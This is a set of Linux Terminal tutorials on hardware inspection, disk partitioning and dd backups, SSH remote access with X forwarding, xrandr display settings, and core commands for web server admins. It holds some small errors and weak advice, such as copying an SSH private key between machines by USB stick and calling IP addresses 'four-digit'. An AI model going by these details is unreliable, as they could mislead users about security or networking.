Both work in a similar way - the command on its own lists each connected device - which bus it's on, its device number and ID, plus some descriptive information (typically manufacturer and model) to help identify which is which. Add the -v switch for a more detailed view and don't forget to invoke them using sudo to ensure you have full access to all connected hardware.
Of the two, lspci produces less information in verbose mode—sudo lspci -v will list each device by type and name, then list some extra details including the device's various capabilities and - rather usefully - which kernel driver it's using. Type lsusb -v, however, and you'll be assailed by pages and pages of detailed information about each detected device. Navigating this by hand is excruciating, so start by identifying the USB device you want to check in more detail using sudo lsusb.

> Use the -v flag with the lspci command to generate a more useful view of your system's internal hardware—including driver information.

Make a note of its bus number and device number, then type the following command: sudo lsusb -D /dev/bus/usb/00x/00y. Replace 00x with your target device's bus number, and 00y with its device number. This will limit the output to the selected device only.

Want a friendlier way to view USB devices? Type sudo apt-get install usbview to install the USB Viewer tool. Note that while it runs in a GUI, you need to invoke it from the Terminal using the sudo usbview command.

One final tool that's worth considering for learning more about your hardware is the dmidecode utility, which takes the information listed in your PC's BIOS and presents it in a more user-friendly format. What's particularly useful about this tool is that it can glean information from your PC's motherboard, such as the maximum amount of supported memory or the fastest processor it can handle. It's best used in conjunction with the -t switch, which allows you to focus the dmidecode tool on a specific part of your system's hardware, eg sudo dmidecode -t bios.
The BIOS option reveals key information about your motherboard, including what capabilities it supports (including UEFI, USB legacy and ACPI) plus the current BIOS version, including its release date. Other supported keywords include 'baseboard' for identifying your motherboard make, model and serial number, 'processor' (check the Upgrade field to see what kind of socket it's plugged into), 'memory' and 'chassis'.
Note that the DMI tables that contain this BIOS-related information aren't always accurate, so while dmidecode is a potentially useful resource, don't be shocked if certain things don't stack up (it incorrectly reported only half of our RAM, eg). Treat it with due care and it adds another layer to your system information armoury. ■
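For instance, sticking with the keywords mentioned above, the following are all valid targets - run each with sudo and compare the output against what you know about your machine:
sudo dmidecode -t baseboard
sudo dmidecode -t processor
sudo dmidecode -t memory
sudo dmidecode -t chassis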


Terminal:
Set up partitions
It's time to reveal everything you need to know about setting up a hard disk,
from partitioning and formatting to setting permissions.

A core hard drive skill is partitioning. You'll have encountered this during the Ubuntu setup, but there may be times when you need to repartition a drive—or set one up for the first time. In this Terminal tutorial, we'll examine how this is done from the command line. There are two tools you can use: fdisk and parted. The former, fdisk, is better known, and one of its strengths is that any changes you make aren't immediately written to disk; instead you set things up and use the w command to exit and write your changes to disk. If you change your mind or make a mistake, simply type q and press Enter instead and your drive is left untouched.
Traditionally, fdisk has only been known to support the older MBR partition scheme, which limited its use to drives that are under 2TB in size. From Ubuntu 16.04, however, fdisk directly supports larger drives and the GPT partition scheme. If you're running an older version of Ubuntu, substitute fdisk with gdisk instead for a version of fdisk with GPT support.
Another limitation of fdisk is that it's purely a destructive tool. That's fine if you're partitioning a disk for the first time or are happy deleting individual partitions (or indeed wiping the entire disk and starting from scratch). If you want to be able to resize partitions without deleting the data on them, however, then you'll need parted instead (see the box 'Resize partitions' for details).

Partition with fdisk
Let's begin by using fdisk to list the drives on your system:
sudo fdisk -l
Each physical drive - sda, sdb and so on - will be displayed one after the other. To restrict its output to a specific disk, use sudo fdisk -l <device>, replacing <device> with /dev/sda or whichever disk you wish to poll. You'll see the disk's total size in GiB or TiB, with the total number of bytes and sectors also listed. You'll see the sector size (typically 512 bytes) and the disk type: DOS (traditional MBR) or GPT. There's also the disk identifier, which you can ignore for the purposes of this tutorial.
Beneath this you will see a list of all existing partitions on the drive, complete with start and end points (in bytes), size and type, such as 'Linux filesystem', 'Linux swap' or 'Windows recovery environment'. Armed with this information you should be able to identify each drive, helping you target the one you wish to partition. This is done as follows:
sudo fdisk <device>

Take a drive backup


Partitioning is a dangerous business: if things go wrong or you make the wrong choice you could end up wiping your entire drive of any existing data. If you're planning to repartition an existing drive, it pays to take a full backup of the drive first.
There are, of course, numerous tools for this particular job, but it's hard to look beyond the fabulous dd utility. You can use it to clone partitions to new drives, but here we've focussed on using it to create a compressed image file of an entire drive or partition. It uses the following syntax:
sudo dd if=/dev/sda | gzip > /media/username/drive/image.gzip
Replace /media/username/drive with the path to your backup drive. The GZIP application offers the best compromise between file compression and speed when creating the drive image. Note that if you're planning to image your entire system drive, you will need to first boot from your Ubuntu live CD and run dd from there.
While you're at it, you can also use dd to back up your drive's Master Boot Record if it's using a MBR partition scheme:
sudo dd if=/dev/sda of=/media/username/drive/MBR.img bs=512 count=1
The action of restoring a drive image if things go wrong is basically the opposite—again, do so from your live CD:
sudo gzip -dc /media/username/drive/image.gzip | dd of=/dev/sda
sudo dd if=/media/username/drive/MBR.img of=/dev/sda

> When you use dd, it doesn't provide any progress meter while it's backing up the drive, but it will alert you if something goes wrong.
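On newer systems you don't have to work entirely blind, either: as the tip later in this tutorial points out, dd gained a status=progress option in coreutils 8.24, and a larger block size usually speeds things up. A hedged variant of the backup command (the bs=4M value is just a sensible guess, not gospel) would be:
sudo dd if=/dev/sda bs=4M status=progress | gzip > /media/username/drive/image.gzip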


Resize partitions
If you want to resize a partition without data loss, you will need to use the parted utility—this is the command-line equivalent of the Gparted tool and offers similar functionality to fdisk with one crucial addition: the ability to resize existing partitions. In a similar way to fdisk, you launch the utility by selecting your target device like so:
parted /dev/sdb
First, enter 'print' for an overview of the drive's current structure—you'll need to make a note of the start and end points of each partition. Then use the resizepart command to shrink or grow a partition:
resizepart 1 4500
remembering to replace 1 with the target partition number, and 4500 with the new end point. It can be quite a complicated manoeuvre: you may need to shrink one partition before growing the other in its place (if you go down this route, when you grow the second partition you'll need to specify its start and end points, eg resizepart 2 450 4500). If it all starts to get too complicated, use Gparted instead.

This will have fdisk switch to command mode. Type m and hit Enter to see a list of all supported commands.
Let's start by checking the existing partition table for the drive: type p and hit Enter. This displays the same output as the fdisk -l command. If the disk isn't currently empty, you'll see a list of existing partitions appear. From here you have two options: wipe the disk completely and start from scratch or remove individual partitions and replace them.
Before going any further, remember the fail-safe: until you exit with the w command, no changes are made. So if you make a mistake and want to start again, use q instead, then start from scratch. To mark an existing partition for deletion—thereby wiping all its data, but leaving the rest of the disk intact—type d and hit Enter. You'll be prompted to enter the partition number, which you can identify from the device list (eg, '1' refers to sdb1 and '2' to sdb2 etc). Press the number and the partition is marked for deletion, which you can verify by typing p again—it should no longer be listed.
Alternatively, wipe the entire disk - including all existing partitions on it - and start from scratch. To do this, you need to create a new partition table (or label). There are four options, but for most people you'll either want a DOS/MBR partition table (type o) or a GPT (type g) one.
Once the disk is empty or you've removed specific partitions, the next step is to create a new partition (or more). Type n and hit Enter. You'll be prompted to select a partition number up to 4 (MBR) or 128 (GPT) and in most cases, just pick the next available number. You'll then be asked to select the first sector from the available range—if in doubt, leave the default selected. Finally, you'll be prompted to set the drive's size, either by setting its last sector, choosing the number of sectors to add or - the easiest choice - by entering a physical size for the partition, typically in G (gigabytes) or T (terabytes). To create a partition 100GB in size, type +100G and hit Enter. At this point, fdisk will tell you it's created a new partition of type 'Linux filesystem'. If you'd rather the partition used a different file system, type t followed by the partition number. You'll be prompted to enter a Hex code—pressing L lists a large range of alternatives, and the simplest thing from here is to select the hex code you want with the mouse, right-click and choose 'Copy' and right-click at the fdisk prompt and choose 'Paste'. If you want to create a FAT, exFAT/NTFS or FAT32 file system, eg, paste the 'Basic Microsoft data' code.
Happy with the way you've set up your partitions? Type p one more time and verify everything's the way you want to set it, then press w and hit Enter to write your changes to the disk. Although the disk has been partitioned, you now need to format it. This is done using the mkfs command:
sudo mkfs -t <fs-type> <device>
Replace <fs-type> with the relevant filesystem (ext3 or fat32, eg) and <device> with your device (such as /dev/sdb1). Depending on the size of the partition this can take a while to complete—a couple of hours in extreme cases. Once done, you'll need to mount the drive to a specific folder:
sudo mount <device> <mountpoint>
In most cases, you'll want to set <mountpoint> to /media/<username>/<folder>, replacing <username> with your username, and creating a folder there for the partition to reside in, eg: sudo mount /dev/sdb1 /media/nick/3TBdrive.

Fix drive permissions
If you format the drive using the default 'Linux filesystem' option then as things stand you have no write permissions on the drive—to fix this for an external drive, type the following:
sudo chown -R <username> <mountpoint>
If you'd like to widen access to the drive without giving up ownership, try the following three commands:
sudo chgrp plugdev <mountpoint>
sudo chmod g+w <mountpoint> && sudo chmod +t <mountpoint>
This will allow members of the plugdev group to create files and sub-directories on the disk—the +t flag ensures they can only delete their own files and sub-folders.

> You must set up appropriate permissions on the new partition after formatting it in order to access it.

Finally, note that drives aren't automatically mounted at each startup - you'll need to manually add them to the /etc/fstab file (see Linux Format 111 for editing configuration file advice) - here's the line you should add for ext3 file systems:
<UUID> <mountpoint> ext3 defaults 0 2
You will need to replace <UUID> with the partition's Disk Identifier, which you can get by using the sudo blkid <device> command. You want to use this identifier instead of the device itself, because it's the only consistent way of identifying the partition. Once saved, test that this works with the sudo mount -a command—if there are no errors, congratulations: your hard disk has been partitioned and set up correctly! ■

We have told a lie: you can get dd to display its progress since v8.24 by adding the option status=progress, which is nice.
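To make that last step concrete, a hedged example (the UUID below is invented - use whatever blkid actually reports for your partition) might run:
sudo blkid /dev/sdb1
Then append a line such as the following to /etc/fstab:
UUID=1a2b3c4d-0000-4e5f-8888-9a9a9a9a9a9a /media/nick/3TBdrive ext3 defaults 0 2
Finish with sudo mount -a to confirm the entry parses cleanly before you reboot.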


Terminal:
Remote access
Uncover how to run another computer's X Window applications through
your own desktop with SSH aka secure shell access.

One of the great things about the Terminal is that it allows you to access and control another PC remotely using SSH. This is particularly useful if you have a PC set up as a dedicated server, one that's running headless (so no attached monitor or input devices), as it enables you to tuck it away somewhere while retaining easy access to it from another computer.
Systems running Ubuntu typically use OpenSSH to manage command-line connections—this basically gives you access from the Terminal to the command line of your target PC, but what if you need to run an application that requires a graphical interface? If your target PC has a desktop environment in place, such as Unity, then you could investigate VNC as an option for connecting the two.
Most dedicated servers, however, don't ship with a desktop in place to cut resources and improve performance. Thankfully, you can still access the GUI of an application through the X Window system with SSH, using a process called X Forwarding.
This is done using the X11 network protocol. First, you need to set up both PCs for SSH—if you're running Ubuntu, then the OpenSSH client is already installed, but you may need to install OpenSSH Server on your server or target PC:
$ sudo apt-get update
$ sudo apt-get install openssh-server
Once installed, switch to your client PC while on the same network and try $ ssh username@hostname. Replace username with your server PC's username, and hostname with its computer name or IP address, eg nick@ubuntu.
You should see a message warning you that the host's authenticity can't be established. Type 'yes' to continue connecting, and you'll see that the server has been permanently added to the list of known hosts, so future attempts to connect won't throw up this message.
You'll now be prompted to enter the password of the target machine's user you're logging on as. Once accepted, you'll see the command prefix changes to point to the username and hostname of your server PC (the Terminal window title also changes to reflect this). This helps you identify this window as your SSH connection should you open another Terminal window to enter commands to your own PC. When you're done with the connection, type exit and hit Enter to close the connection. You've now gained access to the remote server through your own PC. How do you go

Disable password authentication


SSH servers are particularly vulnerable to password brute-force attacks. Even if you have what you consider a reasonably strong password in place, it's worth considering disabling password authentication in favour of SSH keys.
Start by generating the required public and private SSH keys on your client:
$ ssh-keygen -t rsa -b 4096
Hit Enter to accept the default location for the file. When prompted, a passphrase gives you greater security, but you can skip this by simply hitting Enter. Once created, you need to transfer this key to your host:
$ ssh-copy-id username@hostname
(Note, if you've changed the port number for TCP communications you'll need to specify this, eg ssh-copy-id -p 100 nick@ubuntuvm.) Once done, type the following to log in:
$ ssh 'user@hostname'
Specify your passphrase if you set it for a more secure connection. You can then disable insecure connections on the host PC by editing the sshd_config file to replace the line #PasswordAuthentication yes with:
PasswordAuthentication no
Once done, you'll no longer be prompted for your user password when logging in. If you subsequently need access from another trusted computer, copy the key file (~/.ssh/id_rsa) from your client to the same location on that computer using a USB stick.

> Generate SSH public and private keys to ensure a more secure connection.
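A quick sketch of the edit-and-apply cycle on the server (assuming Ubuntu's default paths) looks like this:
$ sudo nano /etc/ssh/sshd_config    # set PasswordAuthentication no
$ sudo sshd -t                      # test the config for syntax errors
$ sudo service ssh restart
The sshd -t step is optional but cheap insurance: a typo in sshd_config could otherwise lock you out of a remote machine.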


Set up restricted access


You can grant different levels of access to the server to different users if you wish, too. If necessary, you can create a limited user on the server - the simplest way to do this is through the User Accounts system settings tool where you then enable the account and set a password - and then log into that account once to set it up. Once done, log off and back into your main account, then add the following line to the end of your sshd_config file:
Match User username
Beneath this line, add any specific rules you wish to employ for that user: eg you could grant a limited user access using a password rather than an SSH key, eg
PasswordAuthentication yes
If your server has multiple users set up, but you wish to only give remote access to a select few, limit access by adding the following lines (make sure these go above any Match User lines you define):
AllowUsers name1 name2 name3
Alternatively, you could restrict by group:
AllowGroups group1 group2
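Pulling those directives together, a hedged example fragment of sshd_config (the usernames are invented) might read:
AllowUsers nick guest
Match User guest
    PasswordAuthentication yes
    X11Forwarding no
Everything under a Match block applies only to the matched user, so keep such blocks at the bottom of the file.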

> The sshd_config file allows you to fine-tune who has access to your server over SSH.

about running a desktop application on the server through your own PC's GUI? You need to enable X11 forwarding. This should be enabled by default on the server, which you can verify by examining OpenSSH's configuration file:
$ sudo nano /etc/ssh/sshd_config
Look for a line marked X11Forwarding yes and make sure it's not commented out (it isn't by default). Assuming this is the case, close the file and then verify the existence of xauth on the server with $ which xauth.
You should find it's located under /usr/bin/xauth. Now switch back to your client PC and connect using the -X switch: $ ssh -X username@hostname. Test the connection is working by launching a GUI from the command line, eg $ firefox &. The Firefox window should appear, indicating success. Note the & character, which runs the application in background mode, allowing you to continue issuing commands to the server through Terminal. You can now open other remote apps in the same way, eg nautilus &.
It's also possible to SSH in precisely for the purposes of running a single application, using the following syntax:
$ ssh -f -T -X username@hostname appname
When you exit the application, the connection is automatically terminated too.

Remote graphical access
If you're solely interested in accessing your server over your local network, you're pretty much set, but SSH is also set up by default to allow tunnelled network connections, giving you access to your server over the internet. Before going down this route, it pays to take a few precautions. The first is to switch from password to SSH key authentication (see Disable Password Authentication, bottom left).
Second, consider signing up for a Dynamic DNS address from somewhere like www.noip.com/free—this looks like a regular web address, but is designed to provide an outside connection to your network (typically over the internet). There are two benefits to doing this: first, it's easier to remember a name like yourhost.ddns.net than it is a four-digit IP address, and second, the service is designed to spot when your internet IP address changes, as it usually does, ensuring the DDNS continues to point to your network.
SSH uses port 22 for its connections - this resolves automatically within your local network, but when you come to connect over the internet you'll probably find your router stands in the way, rejecting any attempts to connect. To resolve this, you'll need to open your router's administration page and find the forwarding section. From here, set up a rule that forwards any connections that use port 22 to your server PC using its local IP address (192.168.x.y).
Once set up, connecting over the internet should be as simple as $ ssh -X username@yourhost.ddns.net.
If you'd like to fine-tune your server settings further, reopen the sshd_config settings file using nano and focus on these areas. First, consider changing the port SSH uses from 22 to something less obvious, such as 222. Remember to update your port-forwarding settings on your router if applicable, and connect using the following syntax: ssh -X user@host -p 222. If you plan to use SSH key authentication (see bottom left), set that up before changing the port due to a bug.
If you'd like to restrict access to your server to the local network only, the most effective way to do this is by removing the port forwarding rule from your router and disabling UPnP. You can also restrict SSH to only listen to specific IP addresses—add separate ListenAddress entries for each individual IP address or define a range:
ListenAddress 192.168.0.10
ListenAddress 192.168.0.0/24
There are two specific settings relating to X Windows access: if you want to disable it for any reason or disable it for specific users (see the 'Set up Restricted Access' box, above), then set X11Forwarding to no. The X11DisplayOffset value of 10 should be fine in most cases—if you get a Can't open display: :0.0 error, then some other file or setting is interfering with the DISPLAY value. In the vast majority of cases, however, this won't happen. After saving the sshd_config file with your settings, remember to restart the server to enable your changes with:
$ sudo service ssh restart
One final thing—if you want to access the X11 Window manager without having to use the -X flag, you need to edit a configuration file on your client PC:
$ nano ~/.ssh/config
This will create an empty file—add the line: ForwardX11 yes. Save the file and exit to be able to log on using SSH and launch graphical applications. ■
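If you find yourself typing the same connection details repeatedly, the same ~/.ssh/config file can also hold per-host shortcuts. A sketch along the lines of the article's examples (the hostname, user and port are placeholders) would be:
Host myserver
    HostName yourhost.ddns.net
    User nick
    Port 222
    ForwardX11 yes
With that in place, a plain ssh myserver picks up all of those settings automatically.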


Terminal:
Display settings
It's time to go beyond the confines of Screen Display settings to take full
control of your display resolution settings with xrandr.

Xrandr is your best friend if you're looking for a way to manipulate your monitor's display through the Terminal. It's the command-line tool that gives you control over RandR ('Resize and Rotate'), the protocol used for controlling the X Window desktop. RandR can be configured through the Screen Display Settings tool, but it's limited in scope and as you're about to discover, xrandr can do much more.
Let's dive straight in and see what xrandr can do. First, open the Terminal and type $ xrandr. This will list the following attributes: Screen 0, a list of supported inputs from the computer (a combination of LVDS for laptop displays, DVI, VGA and HDMI ports) and finally a list of configured desktop resolutions.
Screen 0 is the virtual display—this is effectively made up of the outputs of all monitors attached to your PC (so don't think of them as separate entities, but components of this larger, virtual display). Its maximum size is enough to comfortably fit up to eight full HD screens at once, although in practical terms you're likely to have no more than 1-3 displays attached. The current size displayed here is the sum of all your displays, and reflects whether they've been configured to sit side-by-side or on top of each other.
Next, you'll see that each supported display input is listed as disconnected or connected. Whichever input is connected will correspond to the display in question, either LVDS for a laptop's internal display, or DVI, HDMI or VGA for external monitor connections. Next to this is the current resolution, plus - if two or more display monitors are currently connected - their positions in relation to each other (eg, 1920x1080+1920+0 indicates the display in question is to the right of the main one, while 1920x1080+0+1080 would place it beneath the primary display). You'll also see some additional information in brackets next to each input, eg, (normal left inverted right x axis y axis). This refers to the way the screen has been rotated.

Xrandr settings
Beneath this you'll then see a list of supported display resolutions, from the highest resolution to the smallest. You'll also see a list of numbers to the right of these. Each number refers to a supported frame rate (typically between 50Hz and 75Hz), with the currently selected frequency and resolution marked with a '*+' symbol. Framerates aren't important on LCDs in the way they are on older cathode-ray models—as a rule of thumb, the default setting (typically 60Hz) should be fine, but some displays do support up to 144Hz.

> One of the main uses for xrandr is to open up Ubuntu to use all your display's supported resolutions.
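If all you want from that output is a quick list of which outputs are actually in use, filtering it through grep works nicely:
xrandr | grep " connected"
Each matching line names a connected output along with its current resolution and position within the virtual display.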

Make xrandr changes persistent


If you want to make your edits permanent, you'll need to edit some config files. The standard way of doing this is using xorg.conf but it can be quite fiddly. If you're looking for a fast and dirty way of changing screen resolution, and are happy to accept that it'll affect the screen only after you log on as your user account, do $ nano ~/.xprofile.
Ignore the error, and this should generate an empty, hidden file called .xprofile. Type your commands into the file as if you're entering them into the Terminal, one per line. The following example creates and applies a new resolution setting on boot:
xrandr --newmode "1368x768_60.00" 85.25 1368 1440 1576 1784 768 771 781 798
xrandr --addmode HDMI-1 1368x768_60.00
xrandr --output HDMI-1 --mode 1368x768_60.00
Press Ctrl+O to save the file, then Ctrl+X to exit. The file needs to be executable, so use: $ sudo chmod +x ~/.xprofile. Reboot your PC and you should find that it boots to the specified resolution.


Troubleshoot display issues


Xrandr is a powerful tool, but as with all good command-line tools, things can go wrong. If your displays get messed up, then simply logging off and back on again should reset them to their defaults, or you can try xrandr -s 0 to reset the main display to its default setting.
If you're unsure about whether or not a resolution will work correctly, try the following line when setting a new resolution:
$ xrandr --output HDMI-0 --mode 1920x1200_60.00 && sleep 10 && xrandr --output HDMI-0 --mode 1920x1080
This will attempt to set your new resolution, then after 10 seconds revert to the original resolution. If the display goes blank for this time, the new resolution isn't supported.
Sometimes you may get a BadMatch error when attempting to add a resolution. This could be down to a number of issues. Try doing a web search for the error. We experienced a BadMatch (invalid parameters) error when attempting to add our own custom modes, eg; this may have reflected the fact that one of our displays was connected through a KVM switch, but in the event switching from the proprietary Nvidia driver back to the open-source Nouveau driver resolved the issue.

The main use for xrandr is to change the display resolution of your monitor, which is done with the following command:
$ xrandr --output HDMI-0 --mode 1680x1050
Substitute HDMI-0 for the connected display, and 1680x1050 for the desired mode from those supported. You can also set the frame rate by adding --rate 60 to the end, but as we've said, this isn't normally necessary.
If you've got only one display attached, you can replace both --output and --mode flags with a single -s flag, which tells xrandr to set the resolution for the default display to the specified size: $ xrandr -s 1680x1050.

Add new resolutions
Thanks to bugs in your hardware or drivers, the full set of resolutions your monitor supports aren't always detected. Thankfully, one of the big advantages of xrandr over the Screen Display utility is its ability to configure and set resolutions that are not automatically detected. The cvt command allows you to calculate the settings a particular resolution requires, then set up a new mode for xrandr to use before finally applying it to your target display. Start by using the cvt command like so: $ cvt 1920 1080 60
The three figures refer to the horizontal and vertical sizes, plus the desired refresh rate (in most cases this should be 60). This will deliver an output including the all-important Modeline. Use the mouse cursor to select everything after Modeline, then right-click and choose Copy. Next, type the following, adding a space after --newmode and without pressing Enter: $ xrandr --newmode . Now right-click at the cursor point and choose 'Paste'. This should produce a line like the following:
$ xrandr --newmode "1920x1200_60.00" 193.25 1920 2056 2256 2592 1200 1203 1209 1245 -hsync +vsync
Now hit Enter, then type xrandr and you should see that the mode has been added to the end of the list of supported resolutions. (Should you wish to remove it at this point, use the --rmmode flag, eg xrandr --rmmode 1920x1200_60.00.)
Next, you need to add the mode to the list of supported resolutions. To do this, type the following:
$ xrandr --addmode HDMI-0 1920x1200_60.00
Again, replace HDMI-0 with your chosen input, and make sure 1920x1200_60.00 matches exactly what was listed inside the quotation marks by the cvt command.
If the resolution is supported, you should now be able to switch to it:
$ xrandr --output HDMI-0 --mode 1920x1200_60.00
Should you subsequently want to remove this mode for any reason, first make sure you're not using it, then issue the following command:
$ xrandr --delmode HDMI-0 1920x1200_60.00
There are many more screen-related tricks up xrandr's sleeve. First, if you have multiple displays connected and you wish to quickly disable one, simply enter this line:
$ xrandr --output VGA-0 --off
If you want to bring it back, just replace --off with --auto for the default resolution, or --mode 1368x768 for a specific supported resolution.
If you have two or more monitors set up, you may wish to change their positions within the virtual display. This is done by moving one display relative to the other using the following flags: --left-of, --right-of, --above and --below, eg:
$ xrandr --output VGA-0 --left-of HDMI-0
This would move the VGA-connected monitor's display to the left of the display connected via your HDMI port.

Mirror displays
But what if you'd like your two displays to mirror the contents of each other? For this, use the --same-as flag:
$ xrandr --output VGA-0 --same-as HDMI-0
If one display has a higher resolution than the other, the display with the lower resolution will chop off the bits it can't show: by using the --panning flag you can have the display move with the mouse to ensure it's always onscreen—simply set it to match the resolution of your main display:
$ xrandr --output VGA-0 --panning 1920x1080

> Panning allows you to display larger resolutions on smaller displays without making them too cramped.

Use these features with care—the only way we've found to disable mirroring and panning settings is through a reboot.
Even this isn't all that xrandr can do—type man xrandr for a comprehensive list of its capabilities, including how to rotate, invert and scale the screen. One major limitation of xrandr is that its changes aren't persistent—in other words, they don't survive when you reboot or when you log off. (To get around this problem, check out the Make Xrandr Changes Persistent box, left). ■
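As a taster of what else is in the man page (the output name is just an example - use your own), rotation and scaling follow the same pattern as the commands above:
xrandr --output HDMI-0 --rotate left
xrandr --output HDMI-0 --rotate normal
xrandr --output HDMI-0 --scale 1.25x1.25
The first turns the display on its side for a portrait monitor, the second puts it back, and the third renders a larger virtual desktop scaled down onto the same panel.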


Admin:
Core commands
20 terminal commands that all Linux web server admins should know.

Are you an 'accidental admin'? Someone who realised, too late, that they were responsible for the workings of a Linux server and - because something has gone wrong - finds themselves lost in a world of terminals and command lines that make little sense to normal humans?
What is SSH, you may be asking yourself. Do those letters after 'tar' actually mean anything real? How do I apply security patches to my server? Don't worry, you're not alone. And to help you out, we've put together this quick guide with essential Linux commands that every accidental admin should know.

Becoming an accidental admin
While we'd argue that they should, not everyone who starts using Linux as an operating system does so through choice. We suspect that most people's first interaction with Linux happens somewhat unwittingly. You click a button on your ISP's account page to set up a personal or business web server - for a website, email address or online application - and suddenly you're a Linux admin. Even though you don't know it yet.
When you're starting out with your web server, things are usually straightforward. Nearly all hosting providers will give you a web interface such as Cpanel or Plesk to manage your server. These are powerful pieces of software that give you quick and easy access to logs, mail services and one-click installations of popular applications such as Wordpress or forums. But the first time you have to do something that isn't straightforward to do through the graphical control panel, you're suddenly out of the world of icons and explanatory tooltips and into the world of the text-only Terminal.
To make things worse, for a lot of people the first time they have to deal with the Terminal is when something has gone wrong and can't be fixed through the control panel. Or perhaps you've just read that there's a major security flaw sweeping the web and all Linux servers must be updated at once (it happens - search for 'Heartbleed' to find out more). Suddenly you realise that your nice control panel hasn't actually been updating your server's operating system with security patches and your small personal blog may well be part of a massive international botnet used to launch DDOS attacks against others. Not only are you a stranger in a strange land, you're probably trying to recover or fix something that was really important to you, but which you never gave much thought to while it was being hosted for a couple of pounds a month and seemed hassle-free.
You are an 'accidental admin'. Someone who is responsible for keeping a Linux webserver running and secure—but you didn't even realise it. You thought all that was included in the couple of pounds a month you pay to your ISP - and only found out it's not when it was too late.
Since most webservers are running Ubuntu, this guide is based on that particular distribution. And all the commands here are just as applicable to a Linux desktop as they are to a web server, of course.
sudo
The most fundamental thing to know about Linux's approach to administration is that there are two types of account that can be logged in: a regular user or an administrator (aka 'superuser'). Regular users aren't allowed to make changes to files or directories that they don't own - and in particular this applies to the core operating system files, which are owned by an admin called 'root'.
Root or admin privileges can be temporarily granted to a regular user by typing sudo in front of any Linux command. So to edit the configuration file that controls which disks are mounted using the text editor, nano, you might type sudo nano /etc/fstab (we don't recommend this unless you know what you're doing). After entering sudo, you'll be asked for your user password. On a desktop PC, this is the same one that you use to log in. If you're logging into your own webserver, however, there's a good chance that you'll already be the root user and won't need a password to make important changes.
If you can't execute sudo commands, your web host has restricted your level of access and it probably can't be changed. User accounts can be part of 'groups' in Linux and only members of the sudoers group can use the sudo command to temporarily grant themselves admin privileges.

> Can't remember that really clever thing you did last week? History is your friend.
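As a quick sketch of how that looks in practice (the file and package names here are just examples, and the last line is a handy bash shortcut):

  sudo nano /etc/fstab    # edit a root-owned config file with admin rights
  sudo apt-get update     # refresh the package lists - another job that needs root
  sudo !!                 # re-run the previous command with sudo if you forgot it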


Connecting to the server

As an accidental admin, your first challenge is going to be connecting to your server in the first place. In your web control panel, you might see an option to open a Terminal or console in your web browser, but this tends to be quite a laggy way of doing things.
It's better to open up a Terminal window on your own machine (if you're running Ubuntu just press Alt+Ctrl+t, if you're on Windows you'll need an application like PuTTY). Now, at your command prompt, type ssh username@yourserver.com (or you can replace yourserver.com with an IP address).
The ssh command will open a secure shell on the target machine with the specified username. You should get a password prompt before the connection is allowed and you will end up in a text interface that starts in the home folder of the username.
If you're going to be connecting regularly, there's an even more secure way of using ssh and that's to bypass the password prompt altogether and use encrypted keys for access instead. To follow this approach, you'll need to create a public/private SSH keypair on your machine (for example, Ubuntu users can type something like ssh-keygen -t rsa -b 4096 -C "your_email@example.com") and copy the public part of the key into the .ssh folder on the target server. You will find some full instructions for doing this here: https://help.github.com/articles/generating-an-ssh-key
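As a rough sketch of that key-based setup - the username and hostname are placeholders, and ssh-copy-id is simply one convenient way of copying the public key across:

  ssh-keygen -t rsa -b 4096 -C "your_email@example.com"   # create the keypair on your own machine
  ssh-copy-id username@yourserver.com                     # install the public key on the server
  ssh username@yourserver.com                             # future logins now use the key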

> Even if someone copies your key, they'll still need a password to unlock it.

chown
There's tons more you can learn about chmod and we strongly recommend that you do, but it has a sister command that's even more powerful. While chmod dictates what users who aren't the owner of a file can do, the chown command changes the file owner and group that it belongs to completely. Again, you'll probably need to put sudo in front of anything you chown, but the syntax is again simple. An example might be chown myname:mygroup filename.file.

> If you're changing names, permissions or ownership, most commands have a -R or -r option, which stands for 'recursive'. Essentially, this changes the attributes of all files inside a folder, rather than just the folder itself.
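For example - the user, group and paths below are only placeholders, with www-data being the usual web server account on Ubuntu:

  sudo chown myname:mygroup filename.file      # hand one file to a new owner and group
  sudo chown -R www-data:www-data /var/www     # recursively re-own an entire web root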
service restart
No, we're not telling you to 'try turning it off and on again', but sometimes it's a good place to start (and sometimes it's essential to load changes into memory). You might be used to starting and stopping background processes on a Windows desktop through the graphical System Monitor or Task Manager. In the command line Terminal on a server it's a little more tricky, but not by much.
Confusingly, because many Linux distributions have changed the way they manage startup services (by switching to systemd), there are two ways of doing this. The old way, which still works a lot of the time, is to just type service myservice restart, preceded with sudo when it's necessary. The new, correct way is a little more verbose: systemctl restart myservice.service. So if you want to restart Apache, for example, the core software which turns a mere computer into a web server, it would be sudo systemctl restart apache2.service.
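For instance, restarting Apache with either syntax looks something like this (swap in whichever service you actually need):

  sudo service apache2 restart              # the old-style way, still widely supported
  sudo systemctl restart apache2.service    # the systemd way
  systemctl status apache2.service          # check that the service came back up cleanly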
su
While sudo gives you great power, it still has limitations. Most of all, if you've got a whole bunch of commands to enter, you don't want to have to type it out at the start of every single line [at least the password has a 5 minute timeout - Ed]. This is where su comes in, which will give you superuser powers until you close the terminal window. Type sudo su followed by your password, and you'll see the prompt change from yourname@yourserver to root@yourserver. You might think su stands for superuser, but it's actually a command to change to any user on the system and, if it's used without an account name after it, su assumes you want to be root. However, using su myname will switch you back to your original, non-super, login.
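A short illustration of the switch (whoami simply prints the name of the current user):

  sudo su      # become root; the prompt changes to root@yourserver
  whoami       # prints 'root' while the elevated shell is active
  exit         # drop back to your normal, non-super login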

ifconfig
Since you're troubleshooting a web server, it's probably a good idea to get as many details about its actual connection as possible noted down. The ifconfig command can be run without sudo privileges and tells you details about every live network connection, physical or virtual. Often this is just for checking your IP address, which it reports under the name of the adaptor, but it's also useful to see if you're connected to a VPN or not. If a connection is described as eth0, for example, it's an Ethernet cable; meanwhile tun0 is a VPN tunnel.

> Unless you can read 1,000 lines a second, you'll need to use ls | less to explore folders.
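For example (on newer Ubuntu releases ifconfig is part of the optional net-tools package, with ip addr as the modern equivalent):

  ifconfig       # show every active interface and its IP address
  ifconfig -a    # include interfaces that are currently down
  ip addr        # the newer alternative if ifconfig isn't installed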


ls
The key to understanding the console is all in the path (see the Path To box, below), which tells you whereabouts you are in the folder structure at any given time. But how do you know what else is in your current location? Easy: you use ls. The ls command lists all the files within the folder that you're currently browsing. If there's a lot of files to list, use ls | less to pause at the end of each page of filenames.

df
Maybe your server problems are to do with disk space? Type df and you'll get a full breakdown of the size and usage of every volume currently mounted on your system. By default it'll give you big numbers in bytes, but if you run df -h (which stands for 'human readable') the volume sizes will be reported in megabytes, gigabytes or whatever is appropriate.
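A few typical invocations of both commands:

  ls -l          # long listing: permissions, owner, size and date for each file
  ls -la | less  # include hidden files and page through long listings
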